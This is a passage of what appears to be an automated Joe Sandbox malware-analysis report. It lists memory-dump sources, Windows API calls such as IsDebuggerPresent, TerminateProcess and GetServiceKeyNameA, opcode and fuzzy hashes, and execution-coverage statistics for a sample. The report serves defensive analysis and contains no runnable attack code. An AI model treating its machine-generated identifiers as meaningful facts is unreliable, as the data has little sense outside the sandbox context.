• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_572.jbxd
Similarity
• API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
• String ID:
• API String ID: 3803058747-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50812d6c148537c975f453f210ee234fcded8bd6a716d7ccd869d7ac18e2cda8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4581fc5b44cedc6388dc6f186122ee8f2792b08881d46a136e530d971f11c6e8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36019E71501701EAE720BFB9D846B0D7BA0AF04724F20462FF459B72D1CB7859009B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,?,?,005D5B40,0000000C), ref: 0040C83E
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,005D5B40,0000000C), ref: 0040C848
                                                                                                                                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0040C84F
                                                                                                                                                                                                                                                                                                                                                                  • __alloc_osfhnd.LIBCMT ref: 0040C870
                                                                                                                                                                                                                                                                                                                                                                  • __set_osfhnd.LIBCMT ref: 0040C89A
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 43408053-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d90f798e2c096a9db0fe2a23a860d11de54a66586ad50496df02bf1c65ad6b1f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52c800735ce2767c80bdb55c38c92d91d6df7c7cee2aea7387d499ee4b27126b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37212532541205DACB21BF75C8817D97B60AF42329F28C76BE464AB2E2C77D8541DF8D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 0040455B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: __FF_MSGBANNER.LIBCMT ref: 004044D2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: __NMSG_WRITE.LIBCMT ref: 004044D9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00401921,00000000,00000001,00000000,?,00404785,00000018,005D5890,0000000C,00404815), ref: 004044FE
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040456E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2734353464-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2c5e14f3abab3b46456315dd7ab5dacecc649fa4160e809dee26b10f61197ba
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED11C4B25055117BCB313BB5BC05A5B3794ABC13A0F21853BFB08BB2E0DE3C8941969D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00406068
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040607F
                                                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040608D
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040609D
                                                                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 004060B1
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e38fd5a7783f07dc4d44450aeaf55c1058efbae2ac8fa8ede39d4278c6af2c9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0F631A413149AD630FF799802B4E37A06F00329F12013FF506B72D2CB7C29109A5E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ]$@2]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-696408521
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 13879186c938b816cccb7c625f1de466437b846b3ba68b322c833f163aa339da
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11043160531257E7349A1DBD4C7662BD5B799324B14423BE302EB3E0E6B8C882D248
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 005CB9EB
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CB9F5
                                                                                                                                                                                                                                                                                                                                                                  • GetServiceKeyNameA.ADVAPI32(00000000,tokijotinelazusoforiyoruki,?,2958E117), ref: 005CBA1F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • tokijotinelazusoforiyoruki, xrefs: 005CBA18
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NamePrivateProfileResourceServiceStringUpdateWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: tokijotinelazusoforiyoruki
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2106879505-666090400
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a292765ebe76e924173564f9a3cee30b9e114d1feedb85776fb342c30718c7c3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012B711412045AE3306F5CDD47F597F64F754B10F40061FE754AA1D1E77058448666
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040C309
                                                                                                                                                                                                                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 0040C33C
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 0040C36D
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 0040C3DB
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f79a345fd2c00daf73f727bc6b056d9c0055be0ebb95a4779142a6a20b339e70
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1831A431910246EFDF20DFA4C8C096E3BA5AF01310F1486BEE861AB2D1D734DD51EB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
Memory Dump Source
• Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7659e4ef46eb3dc854fa885a691a500da997daefc6b5927b0d7f1199e0bd93e6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10117B3200018EBFCF125EC8DD05DEE3F22BB59394B598419FA2D98031D332C9B2AB81
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:24.6%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:223
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:10

                                                                                                                                                                                                                                                                                                                                                                  Callgraph


                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 00694AB0
                                                                                                                                                                                                                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 00694ABF
                                                                                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,0081B8C0,0000000C,00695999,00000000,?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694AEF
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,006959B0,?,006C5FF8,0081C690,0000000C,006C60AA,?,00000000), ref: 00694B00
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d2f168f1c234fbc1eb0db84b56c896eb6ac808ee96d716f7e41c0537d1ba3495
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9db0c556acab1491db248113d37050be2404d0ef9ce48b7016d2b94a45aa8b63
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A271945301AADF60BF74AC06F9F3B6EAF00765F10000DF510A6A99CE788A42DA68
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 26 6c5fe7-6c601b call 696254 call 6959a8 call 6c5faa call 6970ec
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 006C5FF3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __getptd_noexit.LIBCMT ref: 006959AB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006959A8: __amsg_exit.LIBCMT ref: 006959B8
                                                                                                                                                                                                                                                                                                                                                                  • __endthreadex.LIBCMT ref: 006C6003
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __IsNonwritableInCurrentImage.LIBCMT ref: 006C5FBD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __getptd_noexit.LIBCMT ref: 006C5FCD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __freeptd.LIBCMT ref: 006C5FD7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: RtlExitUserThread.NTDLL(?,?,006C6008,00000000), ref: 006C5FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 006C5FAA: __XcptFilter.LIBCMT ref: 006C6014
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __getptd_noexit$CurrentExitFilterImageNonwritableThreadUserXcpt__amsg_exit__endthreadex__freeptd__getptd
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1003287236-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5ace2e70bc2d3c52d8088d9385be9d0b72b17dae02ad738aec28fd26f28fbfb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a89283c4aba3c99d0b47ffbdad6a7f8d104b49c00d8e382c7f34c9978f4e5ab4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65E0ECB5954605DFEB58ABA0C806E7E776AEF48311F20404CF1029B6A2CA75A984DF25
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 006999D2
                                                                                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006999E7
                                                                                                                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(006D9C6C), ref: 006999F2
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00699A0E
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00699A15
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4626248458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dcde4617195335d5d3c577808627ec0208f30a12f7e2c262b8b14ad4a69ab474
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e4f057abdc76eb51c15de7ff52c5ade2ab544b117bf26ad20e1fd5a877e97fd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F021E0B4902305DFCB91DF69FD856447BA9FB88360F10681AF509833A0EFB059828F35
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:7.1%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:6.1%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:310
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:5
